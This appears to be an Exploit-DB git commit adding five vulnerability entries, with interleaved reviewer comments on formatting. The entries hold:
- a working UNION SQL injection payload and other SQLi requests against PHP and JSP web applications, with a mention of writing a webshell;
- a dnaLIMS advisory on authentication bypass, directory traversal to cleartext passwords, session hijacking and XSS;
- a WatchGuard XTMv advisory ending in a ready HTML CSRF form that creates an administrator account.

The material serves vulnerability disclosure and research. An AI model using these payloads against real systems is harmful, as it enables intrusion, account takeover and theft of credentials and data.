DB: 2017-03-11

5 new exploits

Price Comparison Script 2017.1.8 - SQL Injection
Clickbank Affiliate Marketplace Script 2017 - SQL Injection
Kinsey Infor/Lawson / ESBUS - SQL Injection
WatchGuard XTMv 11.12 Build 516911 - User Management Cross-Site Request Forgery
dnaLIMS DNA Sequencing - Directory Traversal / Session Hijacking / Cross-Site Scripting
Offensive Security 2017-03-11 05:01:19 +00:00
parent 6e7ec5be32
commit f2327bc214
6 changed files with 372 additions and 0 deletions

@ -37488,3 +37488,8 @@ id,file,description,date,author,platform,type,port
41572,platforms/hardware/webapps/41572.txt,"ASUSWRT RT-AC53 (3.0.0.4.380.6038) - Session Stealing",2017-03-08,"Bruno Bierbaumer",hardware,webapps,0
41573,platforms/hardware/webapps/41573.txt,"ASUSWRT RT-AC53 (3.0.0.4.380.6038) - Remote Code Execution",2017-03-08,"Bruno Bierbaumer",hardware,webapps,0
41574,platforms/xml/webapps/41574.html,"FTP Voyager Scheduler 16.2.0 - Cross-Site Request Forgery",2017-03-10,hyp3rlinx,xml,webapps,52986
41575,platforms/php/webapps/41575.txt,"Price Comparison Script 2017.1.8 - SQL Injection",2017-03-10,"Ihsan Sencan",php,webapps,0
41576,platforms/php/webapps/41576.txt,"Clickbank Affiliate Marketplace Script 2017 - SQL Injection",2017-03-10,"Ihsan Sencan",php,webapps,0
41577,platforms/jsp/webapps/41577.txt,"Kinsey Infor/Lawson / ESBUS - SQL Injection",2017-03-10,"Michael Benich",jsp,webapps,0
41579,platforms/xml/webapps/41579.html,"WatchGuard XTMv 11.12 Build 516911 - User Management Cross-Site Request Forgery",2017-03-10,KoreLogic,xml,webapps,0
41578,platforms/cgi/webapps/41578.txt,"dnaLIMS DNA Sequencing - Directory Traversal / Session Hijacking / Cross-Site Scripting",2017-03-10,"Shorebreak Security",cgi,webapps,0
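Review bot: the last two added rows are out of id order: 41579 (WatchGuard XTMv, KoreLogic) is inserted before 41578 (dnaLIMS, Shorebreak Security), while every other row in the hunk, including the three context rows 41572 to 41574, ascends by id. Swap the two rows so the CSV stays sorted by id like the rest of the file.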

platforms/cgi/webapps/41578.txt Executable file
@ -0,0 +1,114 @@
Title: Multiple vulnerabilities discovered in dnaLIMS DNA sequencing
web-application
Advisory URL: https://www.shorebreaksecurity.com/blog/product-security-advisory-psa0002-dnalims/
Date published: Mar 08, 2017
Vendor: dnaTools, Inc.
CVE IDs: [2017-6526, 2017-6527, 2017-6528, 2017-6529]
USCERT VU: 929263
Vulnerability Summaries
1) Improperly protected web shell [CVE-2017-6526]
dnaLIMS requires authentication to view cgi-bin/dna/sysAdmin.cgi, which is
a web shell included with the software running as the web user. However,
sending a POST request to that page bypasses authentication checks,
including the UID parameter within the POST request.
2) Unauthenticated Directory Traversal [CVE-2017-6527]
The viewAppletFsa.cgi seqID parameter is vulnerable to a null terminated
directory traversal attack. This allows an unauthenticated attacker to
retrieve files on the operating system accessible by the permissions of the
web server. This page also does not require authentication, allowing any
person on the Internet to exploit this vulnerability.
3) Insecure Password Storage [CVE-2017-6528]
An option, which is most likely the default, allows the password file
(/home/dna/spool/.pfile) to store clear text passwords. When combined with
the unauthenticated directory traversal vulnerability, it is possible to
gain the username and password for all users of the software and gain
complete control of the software.
4) Session Hijacking [CVE-2017-6529]
Each user of the dnaLIMS software is assigned a unique four-digit user
identification number(UID) upon account creation. These numbers appear to
be assigned sequentially. Multiple pages of the dnaLIMS application require
that this UID be passed as a URL parameter in order to view the content of
the page.
Consider the following example:
The URL ahttp://<SERVER NAME
REDACTED>/cgi-bin/dna/seqreq2N.cgi?username=61685578,2410a is a valid URL
to view the page for sequencing requests for the user with the UID of 2410. The
username parameter of the URL is the mechanism for authentication to the
system. The first eight-digit number of the username parameter appears to
be a session identifier as it changes every time the user logs in from the
password.cgi page, however this value is not checked by the seqreq2N.cgi
page. This allows an attacker to guess the four-digit UID of valid user
accounts that have an active session. The user with the UID of 2419
currently has an active session, so we can simply hijack this useras
session by requesting this page and specifying the UID 2419.
5) Cross-site Scripting
The seqID parameter of the viewAppletFsa.cgi page is vulnerable to a
reflected cross site scripting attack via GET request as seen in the
following URL:
http://<SERVER NAME REDACTED>/cgi-bin/dna/viewAppletFsa.cgi?seqID=7415-7<SCRIPT
Alert("XSS") </SCRIPT>
6) Cross-site Scripting
The navUserName parameter of the seqTable*.cgi page is vulnerable to a
reflected cross site scripting attack via POST request as seen in the
example below. The * reflects a short name for a client, (ie Shorebreak
Security may be seqTableSS.cgi or seqTableshorebreak.cgi) and may not be
vulnerable for all dnaLIMS installs.
7) Improperly Protected Content
Many of the pages within the admin interface are not properly protected
from viewing by authenticated users. This can give an attacker additional
system information about the system, or change system/software
configuration.
Software was conducted on a live production system, therefore the pages
themselves were tested, forms within these pages were not.
This is also not an exhaustive list of improperly protected pages:
cgi-bin/dna/configuration.cgi
cgi-bin/dna/createCoInfo.cgi
cgi-bin/dna/configSystem.cgi
cgi-bin/dna/combineAcctsN.cgi
Disclosure Timeline
Thu, Nov 10, 2016 at 4:25 PM: Reached out to vendor requesting PGP key to
securely exchange details of vulnerabilities identified
Thu, Nov 10, 2016 at 4:55 PM: Vendor requests report be physically mailed
to PO box via Postal Service
Wed, Nov 16, 2016, at 11:14 AM: Report mailed to vendor via USPS Certified
Mail
Thu, Dec 8, 2016, at 10:43 AM: Request Vendor acknowledge receipt of the
report
Thu, Dec 8, 2016, at 12:53 PM: Vendor acknowledges receiptI3/4 suggests
placing the software behind a firewall as a solution to the vulnerabilities.
Thu, Dec 8, 2016, at 1:54 PM: Reply that the offered solution mitigates
some risk, but does not address the vulnerabilitiesI3/4 inquire if there is a
plan to address the vulnerabilities
Thu, Dec 8, 2016, at 3:13 PM: Vendor replies aa|Yes, we have a plan. Please
gather a DNA sequence, PO Number, or Fund Number and go to your local
grocery store and see what it will buy you.a
Tue, Feb 28, 2017, at 1:15 PM: Vulnerabilities disclosed to US-CERT
Tue, Mar 7, 2017, at 8:19 AM: Vulnerabilities submitted to MITRE for CVE
assignment
Wed, Mar 8, 2017, at 12:00 PM: Vulnerabilities disclosed publicly
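Review bot: the advisory body carries mojibake where the original used curly quotes and apostrophes: 'hijack this useras session', 'Vendor acknowledges receiptI3/4 suggests', 'Vendor replies aa|Yes, we have a plan ... buy you.a' and 'The URL ahttp://<SERVER NAME REDACTED>/...,2410a'; re-encode these to plain ASCII apostrophes, semicolons and quotation marks before committing. Three documentation points as well: item 6 says the navUserName POST request is shown 'in the example below' but no request follows; item 7 says the admin pages are not protected from viewing by 'authenticated users' where the surrounding text (no authentication required) suggests 'unauthenticated' was intended, and 'Software was conducted on a live production system' reads as 'Testing was conducted'; and the 'CVE IDs' line lists bare values such as '2017-6526' that should carry the CVE- prefix used in the per-item headings and in the other advisories of this commit.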

platforms/jsp/webapps/41577.txt Executable file
@ -0,0 +1,40 @@
##################################################################
# Exploit Title: Kinsey Infor / Lawson (ESBUS) - Multiple SQL Injections
##################################################################
# Date: 3/10/2017
##################################################################
# Exploit Author: Michael Benich
##################################################################
# Vendor homepage: http://www.kinsey.com/infor-lawson.html
##################################################################
# Version: ALL
##################################################################
# Tested on: Windows Server 2008 R2; MySQL ver 5.5
##################################################################
# CVE: CVE-2017-6550
##################################################################
Kinsey's Infor-Lawson application (formerly ESBUS) is vulnerable to SQL injection in at least two parameters:
1) TABLE parameter, PoC below
GET /esbus/servlet/GetSQLData?SCHEMA=ESBUS_INTERNAL&TABLE=SCHEDULEDTASKS UNION ALL SELECT <<ATTACKER INPUT>>&FIELD=LASTRUN&NOHEADER=1&SELECT=CLASS=com.esbus.appliance.SOD_PolicyCheck_SystemRun_TimerTask&OUT=XML HTTP/1.1
2) Query POST parameter
POST /KK_LS9ReportingPortal/GetData?SERVERID=%27;LSF_PROD& HTTP/1.1
<--snip--http headers-->
QUERY=1 AND SLEEP(5) AND ('foo'='foo')) &OUT=TAB
A JSP webshell can then be written to the /esbus/ directory.
##################################################################
Timeline:
12/1/2016 - Contacted generic security emails
12/1/2016 - Received response from vendor ("Thanks for the info...")
2/27/2017 - Followed up with contact and intent to disclose. No reply.
3/10/2017 - Disclosure
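Review bot: 'Version: ALL' is not supported by the evidence in the file, which records a single tested configuration (Windows Server 2008 R2, MySQL 5.5) and a timeline in which the vendor never shipped a fix; state the version actually tested and say explicitly that no patched release existed at disclosure, so readers can judge whether a later release is affected. The title also differs between this file ('Kinsey Infor / Lawson (ESBUS) - Multiple SQL Injections') and the files.csv row ('Kinsey Infor/Lawson / ESBUS - SQL Injection'); use one form in both places. In the second PoC the request line's SERVERID=%27;LSF_PROD value is never explained; say whether it is part of the finding or simply the lab environment's server id, since as written the reader cannot tell which request components are required.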
##################################################################

platforms/php/webapps/41575.txt Executable file
@ -0,0 +1,22 @@
# # # # #
# Exploit Title: Price Comparison Script v2017.1.8 - SQL Injection
# Google Dork: N/A
# Date: 10.03.2017
# Vendor Homepage: https://www.axisitp.com/
# Software: https://www.axisitp.com/price-comparison-script.php
# Demo: http://www.pricecomparisonscript.info/
# Version: 2017.1.8
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/merchantratings.php?merchantid=[SQL]
# http://localhost/[PATH]/compare.php?pid=[SQL]
# For example;
# -100'+/*!50000union*/+select+1,2,3,4,0x496873616e2053656e63616e203c62723e207777772e696873616e2e6e6574,6,database(),8,9,10,11,12,13,14,15,16,17,18,19,20--+-
# axisitp_newpcs
# Etc..
# # # # #
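Review bot: the PoC does not say which of the two listed parameters (merchantratings.php?merchantid or compare.php?pid) the UNION payload was run against, and the bare 'axisitp_newpcs' line under it is unlabelled; it reads as the database() output returned in the payload's seventh column, and should be described as such. Unlike the other advisories in this commit there is no vendor contact, no disclosure timeline and no fixed-version statement, so a reader cannot tell whether 2017.1.8 is still the current release or whether the vendor at https://www.axisitp.com/ was notified; add a timeline or an explicit 'no fix available at publication' line.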

platforms/php/webapps/41576.txt Executable file
@ -0,0 +1,18 @@
# # # # #
# Exploit Title: Clickbank Affiliate Marketplace Script v2017 - SQL Injection
# Google Dork: N/A
# Date: 10.03.2017
# Vendor Homepage: https://www.axisitp.com/
# Software: https://www.axisitp.com/clickbank-affiliate-marketplace-script.php
# Demo: http://www.clickbank.axisitp.com/
# Version: 2017
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/merchantratings.php?merchantid=[SQL]
# Etc..
# # # # #
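Review bot: this entry carries no proof of concept: the 'SQL Injection/Exploit' section names the same merchantratings.php?merchantid=[SQL] endpoint as 41575 and then 'Etc..', so the finding cannot be verified from the file. Record at least the parameter type, the request that was confirmed and the observed response, and add a disclosure timeline as 41578 and 41577 in this commit do. Since both products come from the same vendor (axisitp.com) and expose the identical endpoint, also say whether the two scripts share the vulnerable code; that matters for anyone triaging which of the vendor's products need to be patched or taken offline.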

platforms/xml/webapps/41579.html Executable file
@ -0,0 +1,173 @@
<!--
KL-001-2017-004 : WatchGuard XTMv User Management Cross-Site Request Forgery
Title: WatchGuard XTMv User Management Cross-Site Request Forgery
Advisory ID: KL-001-2017-004
Publication Date: 2017.03.10
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-004.txt
1. Vulnerability Details
Affected Vendor: WatchGuard
Affected Product: XTMv
Affected Version: v11.12 Build 516911
Platform: Embedded Linux
CWE Classification: CWE-352: Cross-Site Request Forgery (CSRF)
Impact: Privileged Access
Attack vector: HTTP
2. Vulnerability Description
Lack of CSRF protection in the Add User functionality of the
XTMv management portal can be leveraged to create arbitrary
administrator-level accounts.
3. Technical Description
As observed below, no CSRF token is in use when adding a new
user to the management portal.
POST /put_data/ HTTP/1.1
Host: 1.3.3.7:8080
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 365
Cookie: session_id=50f607247265897581a407bfb8b75e30d2b77287
DNT: 1
Connection: close
{"__class__":"PageSystemManageAdminUsersObj","__module__":"modules.scripts.page.system.PageSystemManageAdminUsersObj","users":[],"add_entries":[{"__class__":"AdminUserObj","__module__":"modules.scripts.vo.AdminUserObj","name":"hacked","domain":"Firebox-DB","role":"Device
Administrator","hash":"hacked","enabled":1,"rowindex":-1}],"upd_entries":[],"del_entries":[]}
The HTTP response indicates that the changes were successful.
HTTP/1.1 200 OK
X-Frame-Options: SAMEORIGIN
Content-Length: 68
Expires: Sun, 28 Jan 2007 00:00:00 GMT
Vary: Accept-Encoding
Server: CherryPy/3.6.0
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Date: Sat, 10 Dec 2016 18:08:22 GMT
Content-Type: application/json
Set-Cookie: session_id=50f607247265897581a407bfb8b75e30d2b77287; expires=Sat, 10 Dec 2016 19:08:22 GMT; httponly;
Path=/; secure
Connection: close
{"status": true, "message": ["The changes were saved successfully"]}
Now, the newly created backdoor account can be accessed.
POST /agent/login HTTP/1.1
Host: 1.3.3.7:8080
Accept: application/xml, text/xml, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: text/xml
X-Requested-With: XMLHttpRequest
Content-Length: 414
Cookie: sessionid=515F007C5BD062C2122008544DB127F80000000C; session_id=0a3d24668f5c3b2c7ba7016d179f5f574e1aaf53
DNT: 1
Connection: close
<methodCall><methodName>login</methodName><params><param><value><struct><member><name>password</name><value><string>hacked</string></value></member><member><name>user</name><value><string>hacked</string></value></member><member><name>domain</name><value><string>Firebox-DB</string></value></member><member><name>uitype</name><value><string>2</string></value></member></struct></value></param></params></methodCall>
The response below shows the application issuing an authenticated
session cookie.
HTTP/1.1 200 OK
X-Frame-Options: SAMEORIGIN
Content-type: text/xml
Set-Cookie: sessionid=74B0DC5119495CFF2AE8944A625558EC00000008;secure;HttpOnly
Connection: close
Date: Sat, 10 Dec 2016 19:55:26 GMT
Server: none
Content-Length: 751
<?xml version="1.0"?>
<methodResponse>
<params>
<param>
<value>
<struct>
<member><name>sid</name><value>74B0DC5119495CFF2AE8944A625558EC00000008</value></member>
<member><name>response</name><value></value></member>
<member>
<name>readwrite</name>
<value><struct>
<member><name>privilege</name><value>2</value></member>
<member><name>peer_sid</name><value>0</value></member>
<member><name>peer_name</name><value>error</value></member>
<member><name>peer_ip</name><value>0.0.0.0</value></member>
</struct></value>
</member>
</struct>
</value>
</param>
</params>
</methodResponse>
4. Mitigation and Remediation Recommendation
The vendor has remediated this vulnerability in WatchGuard
XTMv v11.12.1. Release notes and upgrade instructions are
available at:
https://www.watchguard.com/support/release-notes/fireware/11/en-US/EN_ReleaseNotes_Fireware_11_12_1/index.html
5. Credit
This vulnerability was discovered by Matt Bergin (@thatguylevel)
of KoreLogic, Inc. and Joshua Hardin.
6. Disclosure Timeline
2017.01.13 - KoreLogic sends vulnerability report and PoC to
WatchGuard.
2017.01.13 - WatchGuard acknowledges receipt of report.
2017.01.23 - WatchGuard informs KoreLogic that the
vulnerability will be addressed in the forthcoming
v11.12.1 firmware, scheduled for general
availability on or around 2017.02.21.
2017.02.22 - WatchGuard releases v11.12.1.
2017.03.10 - KoreLogic public disclosure.
7. Proof of Concept
-->
<html>
<body>
<form action="https://1.3.3.7:8080/put_data/" method="POST" enctype="text/plain">
<input type="hidden"
name="&#x7b;"&#x5f;&#x5f;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x5f;&#x5f;"&#x3a;"&#x50;&#x61;&#x67;&#x65;&#x53;&#x79;&#x73;&#x74;&#x65;&#x6d;&#x4d;&#x61;&#x6e;&#x61;&#x67;&#x65;&#x41;&#x64;&#x6d;&#x69;&#x6e;&#x55;&#x73;&#x65;&#x72;&#x73;&#x4f;&#x62;&#x6a;"&#x2c;"&#x5f;&#x5f;&#x6d;&#x6f;&#x64;&#x75;&#x6c;&#x65;&#x5f;&#x5f;"&#x3a;"&#x6d;&#x6f;&#x64;&#x75;&#x6c;&#x65;&#x73;&#x2e;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x73;&#x2e;&#x70;&#x61;&#x67;&#x65;&#x2e;&#x73;&#x79;&#x73;&#x74;&#x65;&#x6d;&#x2e;&#x50;&#x61;&#x67;&#x65;&#x53;&#x79;&#x73;&#x74;&#x65;&#x6d;&#x4d;&#x61;&#x6e;&#x61;&#x67;&#x65;&#x41;&#x64;&#x6d;&#x69;&#x6e;&#x55;&#x73;&#x65;&#x72;&#x73;&#x4f;&#x62;&#x6a;"&#x2c;"&#x75;&#x73;&#x65;&#x72;&#x73;"&#x3a;&#x5b;&#x5d;&#x2c;"&#x61;&#x64;&#x64;&#x5f;&#x65;&#x6e;&#x74;&#x72;&#x69;&#x65;&#x73;"&#x3a;&#x5b;&#x7b;"&#x5f;&#x5f;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x5f;&#x5f;"&#x3a;"&#x41;&#x64;&#x6d;&#x69;&#x6e;&#x55;&#x73;&#x65;&#x72;&#x4f;&#x62;&#x6a;"&#x2c;"&#x5f;&#x5f;&#x6d;&#x6f;&#x64;&#x75;&#x6c;&#x65;&#x5f;&#x5f;"&#x3a;"&#x6d;&#x6f;&#x64;&#x75;&#x6c;&#x65;&#x73;&#x2e;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x73;&#x2e;&#x76;&#x6f;&#x2e;&#x41;&#x64;&#x6d;&#x69;&#x6e;&#x55;&#x73;&#x65;&#x72;&#x4f;&#x62;&#x6a;"&#x2c;"&#x6e;&#x61;&#x6d;&#x65;"&#x3a;"&#x68;&#x61;&#x63;&#x6b;&#x65;&#x64;&#x33;"&#x2c;"&#x64;&#x6f;&#x6d;&#x61;&#x69;&#x6e;"&#x3a;"&#x46;&#x69;&#x72;&#x65;&#x62;&#x6f;&#x78;&#x2d;&#x44;&#x42;"&#x2c;"&#x72;&#x6f;&#x6c;&#x65;"&#x3a;"&#x44;&#x65;&#x76;&#x69;&#x63;&#x65;&#x20;&#x41;&#x64;&#x6d;&#x69;&#x6e;&#x69;&#x73;&#x74;&#x72;&#x61;&#x74;&#x6f;&#x72;"&#x2c;"&#x68;&#x61;&#x73;&#x68;"&#x3a;"&#x68;&#x61;&#x63;&#x6b;&#x65;&#x64;&#x33;"&#x2c;"&#x65;&#x6e;&#x61;&#x62;&#x6c;&#x65;&#x64;"&#x3a;&#x31;&#x2c;"&#x72;&#x6f;&#x77;&#x69;&#x6e;&#x64;&#x65;&#x78;"&#x3a;&#x2d;&#x31;&#x7d;&#x5d;&#x2c;"&#x75;&#x70;&#x64;&#x5f;&#x65;&#x6e;&#x74;&#x72;&#x69;&#x65;&#x73;"&#x3a;&#x5b;&#x5d;&#x2c;"&#x64;&#x65;&#x6c;&#x5f;&#x65;&#x6e;&#x74;&#x72;&#x69;&#x65;&#x73;"&#x3a;&#x5b;&#x5d;&#x7d;"
value="" />
<input type="submit" value="Trigger" />
</form>
</body>
</html>
<!--
The contents of this advisory are copyright(c) 2017
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/
KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html
Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt
-->
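Review bot: the narrative and the PoC disagree on the account created: section 3 shows name and hash 'hacked', while the HTML-entity-encoded field name in the section 7 form decodes to name 'hacked3' and hash 'hacked3'; align them so a reader checking the form against the captured request does not conclude the PoC is broken. Section 7 should also state that the form uses enctype="text/plain" with the whole JSON document in the field name and an empty value, so the body actually sent is the JSON followed by '=' and a line break, and that the /put_data/ handler tolerates that trailing '='; the PoC depends on it. On the defensive side, section 4 only links to the 11.12.1 release notes; name the control the fix introduces (for example a per-session anti-CSRF token or an Origin check), and note that the X-Frame-Options: SAMEORIGIN header visible in both responses does not mitigate this issue, because the forged request is a top-level form POST rather than a framed page.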